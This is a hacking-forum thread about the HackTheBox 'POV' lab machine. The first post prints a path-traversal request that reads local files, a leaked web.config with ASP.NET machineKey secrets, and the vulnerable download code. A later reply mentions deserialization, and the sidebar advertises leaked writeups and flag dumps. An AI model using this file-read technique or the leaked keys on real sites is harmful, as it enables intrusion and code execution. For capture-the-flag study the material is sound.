Jan 27, 2024, 10:29 AM
Welcome to POV - HTB
Medium box released 27 Jan 2024
Medium box released 27 Jan 2024
|
POV - HTB
by Art10n - Saturday January 27, 2024 at 10:29 AM
|
|
POST /portfolio/ HTTP/1.1
Host: dev.pov.htb ... file=\\127.0.0.1\C$\Windows\System32\drivers\etc\hosts --- # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost 127.0.0.1 pov.htb dev.pov.htb file=\\127.0.0.1\C$\inetpub\wwwroot\dev\web.config --- <configuration> <system.web> <customErrors mode="On" defaultRedirect="default.aspx" /> <httpRuntime targetFramework="4.5" /> <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" /> </system.web> <system.webServer> <httpErrors> <remove statusCode="403" subStatusCode="-1" /> <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" /> </httpErrors> <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" /> </system.webServer> </configuration> index.aspx.cs using System; using System.Collections.Generic; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using System.Text.RegularExpressions; using System.Text; using System.IO; using System.Net; public partial class index : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { } protected void Download(object sender, EventArgs e) { var filePath = file.Value; filePath = Regex.Replace(filePath, "../", ""); Response.ContentType = "application/octet-stream"; Response.AppendHeader("Content-Disposition","attachment; filename=" + filePath); Response.TransmitFile(filePath); Response.End(); } }
Jan 29, 2024, 01:33 PM
[quote="Art10n" pid='383286' dateline='1706384075']
POST /portfolio/ HTTP/1.1 Host: dev.pov.htb ... file=\\127.0.0.1\C$\Windows\System32\drivers\etc\hosts --- # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost 127.0.0.1 pov.htb dev.pov.htb file=\\127.0.0.1\C$\inetpub\wwwroot\dev\web.config index.aspx.cs how did you know what files to look for? Like the dev folder inside wwwroot? Does it have something to do with the sub domain?
Feb 21, 2024, 08:15 PM
The deserialization is insane.
Feb 24, 2024, 07:09 PM
Interest information to helping solve the box
Feb 25, 2024, 11:01 AM
good solution to fix
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 602 | 91,772 |
7 hours ago Last Post: sabero_exe |
||
| [FREE] CPTS 12 FLAGS | 68 | 1,966 |
Yesterday, 09:54 AM Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,894 |
Yesterday, 08:48 AM Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,622 |
Yesterday, 05:08 AM Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,275 |
Apr 30, 2026, 02:10 PM Last Post: kkkato |
||